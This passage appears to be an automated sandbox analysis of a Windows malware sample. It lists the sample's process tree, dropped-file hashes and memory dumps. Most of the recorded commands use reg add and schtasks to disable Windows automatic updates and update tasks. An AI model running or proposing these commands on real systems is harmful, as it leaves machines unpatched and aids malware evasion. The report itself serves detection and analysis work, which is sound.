  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
[depth 3] C:\Windows\System32\conhost.exe
  command line: C:\Windows\System32\conhost.exe
[depth 4] C:\Windows\System32\conhost.exe
  command line: "C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"
[depth not recoverable from the source] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe hhmzomdryxklm1
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Windows\services.exe
  Filesize: 7.6MB
  MD5: 95104aa61ed30687c13e5c644d5722f3
  SHA1: f9788f808044d448f73203d93da0021cefb781ff
  SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
  SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
- C:\Program Files\Windows\services.exe
  Filesize: 7.6MB
  MD5: 95104aa61ed30687c13e5c644d5722f3
  SHA1: f9788f808044d448f73203d93da0021cefb781ff
  SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
  SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  Filesize: 539B
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
- memory/68-381-0x0000000000000000-mapping.dmp
- memory/200-217-0x0000000000000000-mapping.dmp
- memory/200-233-0x000002D476CA0000-0x000002D476CBC000-memory.dmp (Filesize: 112KB)
- memory/200-239-0x000002D477900000-0x000002D4779B9000-memory.dmp (Filesize: 740KB)
- memory/200-273-0x000002D476CC0000-0x000002D476CCA000-memory.dmp (Filesize: 40KB)
- memory/304-175-0x0000000000000000-mapping.dmp
- memory/316-176-0x0000000000000000-mapping.dmp
- memory/320-216-0x0000000000000000-mapping.dmp
- memory/412-190-0x0000000000000000-mapping.dmp
- memory/412-386-0x0000000000000000-mapping.dmp
- memory/428-180-0x0000000000000000-mapping.dmp
- memory/524-189-0x0000000000000000-mapping.dmp
- memory/796-374-0x0000000000000000-mapping.dmp
- memory/836-384-0x0000000000000000-mapping.dmp
- memory/872-382-0x0000000000000000-mapping.dmp
- memory/1172-392-0x0000000000000000-mapping.dmp
- memory/1376-401-0x00000202326A0000-0x00000202326C0000-memory.dmp (Filesize: 128KB)
- memory/1376-398-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/1376-415-0x00000202327E0000-0x0000020232800000-memory.dmp (Filesize: 128KB)
- memory/1376-405-0x0000020233340000-0x0000020233380000-memory.dmp (Filesize: 256KB)
- memory/1376-403-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/1376-396-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/1376-397-0x000000014036DB84-mapping.dmp
- memory/1376-400-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/1412-194-0x0000000000000000-mapping.dmp
- memory/1424-365-0x0000000000000000-mapping.dmp
- memory/1632-184-0x0000000000000000-mapping.dmp
- memory/1716-178-0x0000000000000000-mapping.dmp
- memory/1724-389-0x0000000000000000-mapping.dmp
- memory/1800-363-0x0000000000000000-mapping.dmp
- memory/1812-133-0x0000000000000000-mapping.dmp
- memory/1876-373-0x000001D49A3E0000-0x000001D49A3E6000-memory.dmp (Filesize: 24KB)
- memory/1876-383-0x000001D4B2DC0000-0x000001D4B2DD2000-memory.dmp (Filesize: 72KB)
- memory/1928-393-0x0000000000000000-mapping.dmp
- memory/1988-387-0x0000000000000000-mapping.dmp
- memory/2072-197-0x0000000000000000-mapping.dmp
- memory/2076-196-0x0000000000000000-mapping.dmp
- memory/2088-174-0x0000000000000000-mapping.dmp
- memory/2100-369-0x0000000000000000-mapping.dmp
- memory/2188-204-0x0000000000400000-0x0000000001119000-memory.dmp (Filesize: 13.1MB)
- memory/2200-182-0x0000000000000000-mapping.dmp
- memory/2244-411-0x000001FB6D0E0000-0x000001FB6D0E6000-memory.dmp (Filesize: 24KB)
- memory/2244-414-0x000001FB6CD70000-0x000001FB6CD77000-memory.dmp (Filesize: 28KB)
- memory/2252-188-0x0000000000000000-mapping.dmp
- memory/2308-177-0x0000000000000000-mapping.dmp
- memory/2492-201-0x0000000000000000-mapping.dmp
- memory/2512-195-0x0000000000000000-mapping.dmp
- memory/2524-199-0x0000000000000000-mapping.dmp
- memory/2536-366-0x0000000000000000-mapping.dmp
- memory/2568-395-0x0000000000000000-mapping.dmp
- memory/2568-198-0x0000000000000000-mapping.dmp
- memory/2708-173-0x0000000000000000-mapping.dmp
- memory/2756-367-0x0000000000000000-mapping.dmp
- memory/2772-181-0x0000000000000000-mapping.dmp
- memory/2828-179-0x0000000000000000-mapping.dmp
- memory/3132-187-0x0000000000000000-mapping.dmp
- memory/3168-191-0x0000000000000000-mapping.dmp
- memory/3320-388-0x0000000000000000-mapping.dmp
- memory/3324-372-0x0000000000000000-mapping.dmp
- memory/3336-370-0x0000000000000000-mapping.dmp
- memory/3528-368-0x0000000000000000-mapping.dmp
- memory/3544-380-0x0000000000400000-0x000000000040C000-memory.dmp (Filesize: 48KB)
- memory/3544-375-0x0000000000400000-0x000000000040C000-memory.dmp (Filesize: 48KB)
- memory/3544-376-0x0000000000401BEA-mapping.dmp
- memory/3672-390-0x0000000000000000-mapping.dmp
- memory/3732-192-0x0000000000000000-mapping.dmp
- memory/3756-185-0x0000000000000000-mapping.dmp
- memory/3768-193-0x0000000000000000-mapping.dmp
- memory/3780-134-0x0000000000000000-mapping.dmp
- memory/3780-139-0x00000210F0540000-0x00000210F0562000-memory.dmp (Filesize: 136KB)
- memory/3780-143-0x00000210F1030000-0x00000210F10A6000-memory.dmp (Filesize: 472KB)
- memory/3876-371-0x0000000000000000-mapping.dmp
- memory/3900-183-0x0000000000000000-mapping.dmp
- memory/3904-119-0x0000000000400000-0x0000000001119000-memory.dmp (Filesize: 13.1MB)
- memory/3908-186-0x0000000000000000-mapping.dmp
- memory/3924-126-0x0000019BA29A0000-0x0000019BA2DBC000-memory.dmp (Filesize: 4.1MB)
- memory/3924-121-0x0000019B87920000-0x0000019B87D3C000-memory.dmp (Filesize: 4.1MB)
- memory/4036-391-0x0000000000000000-mapping.dmp
- memory/4052-364-0x0000000000000000-mapping.dmp
- memory/4056-394-0x0000000000000000-mapping.dmp